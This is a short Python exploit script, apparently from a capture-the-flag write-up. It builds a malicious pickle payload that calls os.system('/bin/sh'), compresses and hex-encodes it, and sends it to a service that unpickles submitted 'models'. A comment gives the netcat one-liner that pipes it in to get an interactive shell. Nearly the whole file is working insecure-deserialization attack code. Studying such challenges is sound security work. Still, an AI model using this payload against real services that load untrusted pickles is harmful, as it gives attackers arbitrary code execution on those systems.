exploit.py

#!/usr/bin/env python3

import pickle
import zlib

# see: https://checkoway.net/musings/pickle/
SHELL = f"""cos
system
(S'/bin/sh'
tR."""

def main():
  # embed = lambda c: "wasdx .#F".index(c)

  # c_actions = "789ced983d72c3201085c3b2e313a451e79934aa7c1e37e9e219fa78262953a5a22437c841239088312c3f5290073bb61a4b9f16bd5d2d3cec0ffcfa7e7c309f67d5f792bd2bc99e94007d48b61bceb6fa0c051c87ef2fea53f5623362c1870335d2506c4204578130865023c95e4dd2ddefe53169034537227b9140580d4d1aad083e2a349975278560a202841e420a2115856503368212799dd5d0eddfa0863791b2d7f56ecac484c018c25814a6a33c24d99b99467b9b8f81e696216e1f22f0919d9b27444c5a7efe9eddccd04718a0e959185738dd1b57e84c5c5a46a0b0b20c17610d043904f101c9579911efd730409043508c308730874a6b98ec8d44f7baab540245ec6db937a74d71818c65036650b06637e56073bd2888e225514585bad7906836aa86ffaa1a7336088da0f21d87bbf6fa364a44d9b5772df34dd8a8fbac84a7cc33fa4bda6855f3f5bd32d21b3cdd1b91b76c5780abd962257ac32dd4bc2df1aa3b87767eba5f6c1fb5cadea655f17ff9d7e18e6e020185808a829a320ebb1f83167820"
  # actions = pickle.loads(zlib.decompress(bytes.fromhex(c_actions)))
  # X, Y = zip(*actions)
  # X = [[embed(c) for c in x] for x in X]
  # Y = [embed(y) for y in Y]

  # import sklearn.tree
  # clf = sklearn.tree.DecisionTreeClassifier()
  # clf.fit(X, Y)

  # cmodel = zlib.compress(pickle.dumps(clf)).hex()

  # print(3)
  # print(cmodel)

  print(3)
  print(zlib.compress(SHELL.encode()).hex())

if __name__ == "__main__":
  main()

# just run as: stty -icanon && (./writeup/exploit.py; cat) | nc localhost 11300